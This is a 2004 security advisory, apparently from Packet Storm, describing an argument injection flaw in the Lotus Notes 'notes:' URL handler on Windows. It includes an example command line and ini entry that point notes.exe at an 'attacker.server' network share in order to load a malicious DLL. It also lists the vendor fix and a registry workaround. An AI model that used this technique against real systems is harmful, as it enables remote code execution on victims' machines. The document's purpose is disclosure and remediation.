exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lotus.inject.txt

lotus.inject.txt
Posted Jun 27, 2004
Authored by Jouko Pynnonen | Site klikki.fi

During the client-side Windows installation of Lotus Notes, a notes: URL handler is registered in the registry. An argument injection attack allows an intruder to pass command line arguments to notes.exe, which can lead to execution of arbitrary code.

tags | advisory, arbitrary, registry
systems | windows
SHA-256 | 7f1d5d7fa6e4854573d335dc29ba01617e06478c0fbeabab00dc2a8338959037

lotus.inject.txt

Change Mirror Download


OVERVIEW
========

Lotus Notes is a groupware/e-mail system developed by Lotus Software.
Due to its security and collaboration features it's used particularly
by large organizations, government agencies, etc. IBM estimates it is
used by 60 million people.

During the client-side Windows installation of Lotus Notes, a "notes:"
URL handler is registered in the registry. An argument injection
attack allows an intruder to pass command line arguments to notes.exe,
which can lead to execution of arbitrary code.



DETAILS
=======

The installed registry entry causes any "notes:" URL to be opened with
notes.exe and the URL passed as the argument. If the URL contains space
characters, notes.exe takes the characters after that as a second
command line argument. Any web page can cause notes.exe be started in
this way by refering to a notes: URL.

Location of Notes configuration file, notes.ini, can be specified on
the command line by prefixing it with an equals sign (=). The notes.ini
file can be located on a network share. An attacker can use the URL to
specify an arbitrary notes.ini file located on a public network share,
so that the command run when opening the URL would be e.g.

notes.exe =\\attacker.server\notes\notes.ini

The notes.ini file contains locations for Notes data directory, which
in this case can be also located on a public network share. The
notes.ini file could contain e.g.

[Notes]
Directory=\\attacker.server\\notes

The program uses this directory to load some dynamic libraries.
The attacker can place arbitrary code in the init section of such DLL
and cause it to be run during notes.exe startup. The scenario was
successfully tested with an exploit. On opening the malicious web
page, the victim system downloaded the DLL and ran the code in it.

The exploit requires that notes.exe isn't already running while the
victim views the malicious web page or e-mail message, because DLL's
are only loaded on program startup. It also requires that outgoing
connections to Internet shares aren't blocked by firewalls or registry
settings.



SOLUTION
========

IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now
been released to solve the issue. As a workaround, the registry key

HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

can be removed.



CREDITS
=======

The vulnerability was discovered and researched by Jouko Pynnönen,
Finland.




--
Jouko Pynnönen Web: http://iki.fi/jouko/
jouko@iki.fi GSM: +358 41 5504555
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close